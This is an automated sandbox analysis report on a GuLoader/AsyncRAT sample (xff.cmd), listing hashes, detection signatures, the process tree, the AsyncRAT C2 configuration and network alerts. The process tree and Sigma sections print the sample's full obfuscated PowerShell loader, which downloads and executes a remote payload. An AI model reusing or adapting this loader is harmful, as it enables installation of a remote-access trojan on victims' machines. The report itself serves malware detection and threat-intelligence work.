Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xff.cmd

Overview

General Information

Sample name:xff.cmd
Analysis ID:1446776
MD5:ae6a3a8912f6dd675542cc40cb5c6088
SHA1:ba9cf3a09d51ab5f090fc9dac6f1253321c922e4
SHA256:cfbbcd80b1537d3ba3b27a57002496542db471094bae1612abc70bac5fd80808
Tags:cmd
Infos:

Detection

AsyncRAT, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected AsyncRAT
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5728 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5700 cmdline: powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4976 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4324 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3940 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5892 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: AsyncRAT

{"Server": "dhhj.duckdns.org", "Port": "8797", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "null"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0xb0698:$x1: AsyncRAT
  • 0xb06d6:$x1: AsyncRAT

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0xc137:$x1: AsyncRAT
  • 0xc175:$x1: AsyncRAT
  • 0xc643:$x1: AsyncRAT
  • 0xc681:$x1: AsyncRAT
0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x2b54f:$x1: AsyncRAT
    • 0x2b58d:$x1: AsyncRAT
    0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x2d323:$x1: AsyncRAT
    • 0x2d361:$x1: AsyncRAT
    00000006.00000002.2632762679.0000000008AD0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      Click to see the 9 entries

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_5700.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi32_4324.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xe05b:$b2: ::FromBase64String(
        • 0xd140:$s1: -join
        • 0x68ec:$s4: +=
        • 0x69ae:$s4: +=
        • 0xabd5:$s4: +=
        • 0xccf2:$s4: +=
        • 0xcfdc:$s4: +=
        • 0xd122:$s4: +=
        • 0x16a20:$s4: +=
        • 0x16aa0:$s4: +=
        • 0x16b66:$s4: +=
        • 0x16be6:$s4: +=
        • 0x16dbc:$s4: +=
        • 0x16e40:$s4: +=
        • 0xd900:$e4: Get-WmiObject
        • 0xdaef:$e4: Get-Process
        • 0xdb47:$e4: Start-Process
        • 0x15531:$e4: Get-Process

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfst

        Snort Signatures

        Timestamp:05/23/24-21:03:56.699407
        SID:2035595
        Source Port:8797
        Destination Port:49711
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/23/24-21:03:56.699407
        SID:2030673
        Source Port:8797
        Destination Port:49711
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Found malware configuration
        Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "dhhj.duckdns.org", "Port": "8797", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "null"}
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
        Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49699 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.6:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49709 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{ source: powershell.exe, 00000006.00000002.2630903523.00000000084F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ws\Mion.pdb source: powershell.exe, 00000006.00000002.2630903523.00000000084F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2617016962.000000000300F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2617016962.000000000300F000.00000004.00000020.00020000.00000000.sdmp

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 12.202.180.134:8797 -> 192.168.2.6:49711
        Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 12.202.180.134:8797 -> 192.168.2.6:49711
        C2 URLs / IPs found in malware configuration
